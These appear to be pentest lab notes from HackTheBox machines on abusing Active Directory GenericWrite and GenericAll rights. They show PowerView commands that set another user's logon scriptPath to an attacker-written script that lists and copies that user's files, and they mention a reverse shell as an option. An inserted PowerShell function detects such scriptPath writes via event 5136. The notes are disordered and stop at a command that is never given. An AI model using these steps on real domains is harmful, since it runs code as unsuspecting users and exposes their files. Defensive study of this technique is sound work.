GenericWrite/GenericAll/AllExtendedRights over Users
GenericAll allows an attacker to modify the object in question. In this example, we change the password of a Domain Administrator. GenericWrite allows the modification of certain attributes (more on this in Object from HackTheBox). Environment: Search from HackTheBox.
You may need to authenticate to the Domain Controller as SMITH@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Set-DomainObject, first create a PSCredential object (these examples come from the PowerView help documentation):
We can basically make the user execute things without the user knowing.
We can use this to view restricted files as the user we have GenericWrite on.
We start by creating a PowerShell script that we can use to view restricted directories or other shit we would want the script to do.
echo "ls C:\Users\Maria\Desktop\ > \ProgramData\out" > test.ps1
echo 'copy C:\Users\Maria\Desktop\Engines.xls C:\ProgramData\Engines.xls' > test.ps1
Set-DomainObject -Identity maria -SET @{scriptpath='C:\ProgramData\test.ps1'}
This is the script we created. We could also have it execute a reverse TCP shell, but if a firewall is blocking outbound traffic, the best we can do is try to get creds from somewhere else.
We could set our credentials if we are running it as another user; otherwise we can specify them the way we normally do.
GenericAll
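From the defender's side, the scriptPath write shown above is recorded on the Domain Controller as Security event 5136. The following is an added example, not part of the original notes or of PowerView: it filters 5136 records for scriptPath writes and flags rooted paths and unexpected editors. The sample events, the DN, the `helpdesk` account, the function name and the allow-list parameter are constructed for illustration.

```powershell
# Added example: flag Security event 5136 records where a user's scriptPath is written.
# 5136 is only logged when "Audit Directory Service Changes" is enabled and the object has a SACL.
function Find-ScriptPathChange {
    param(
        [Parameter(Mandatory)][string[]]$EventXml,
        # Hypothetical allow-list of accounts expected to manage logon scripts
        [string[]]$AllowedEditors = @()
    )
    foreach ($raw in $EventXml) {
        $evt = ([xml]$raw).Event
        if ($evt.System['EventID'].InnerText -ne '5136') { continue }
        # Flatten the <Data Name="..."> elements into a lookup table
        $d = @{}
        foreach ($n in $evt.EventData.Data) { $d[$n.GetAttribute('Name')] = $n.InnerText }
        if ($d['AttributeLDAPDisplayName'] -ne 'scriptPath') { continue }
        if ($d['OperationType'] -ne '%%14674') { continue }   # %%14674 = value added
        $value = [string]$d['AttributeValue']
        [pscustomobject]@{
            Target        = $d['ObjectDN']
            ChangedBy     = $d['SubjectUserName']
            NewValue      = $value
            # Assumption: legitimate logon scripts are NETLOGON-relative, so a
            # drive-letter or UNC path deserves a closer look.
            RootedPath    = $value -match '^(?:[A-Za-z]:\\|\\\\)'
            UnknownEditor = $AllowedEditors -notcontains $d['SubjectUserName']
        }
    }
}

# Constructed sample events (not real log data); field names follow the 5136 EventData schema.
$tmpl = '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>5136</EventID></System><EventData>' +
        '<Data Name="SubjectUserName">{0}</Data><Data Name="ObjectDN">{1}</Data>' +
        '<Data Name="AttributeLDAPDisplayName">{2}</Data><Data Name="AttributeValue">{3}</Data>' +
        '<Data Name="OperationType">%%14674</Data></EventData></Event>'
$samples = @(
    ($tmpl -f 'smith', 'CN=maria,CN=Users,DC=object,DC=local', 'scriptPath', 'C:\ProgramData\test.ps1'),
    ($tmpl -f 'helpdesk', 'CN=maria,CN=Users,DC=object,DC=local', 'description', 'Engineering')
)
# On a Domain Controller, feed real events instead:
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136} | ForEach-Object { $_.ToXml() }
Find-ScriptPathChange -EventXml $samples -AllowedEditors 'helpdesk' | Format-List
```

With the constructed input, only the first event is reported, with both RootedPath and UnknownEditor set to True.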
$SecPassword = ConvertTo-SecureString '<our-users-password>' -AsPlainText -Force
Then
$Cred = New-Object System.Management.Automation.PSCredential('<domain.name>\<our current user>', $SecPassword)
Then with these we can execute the following command.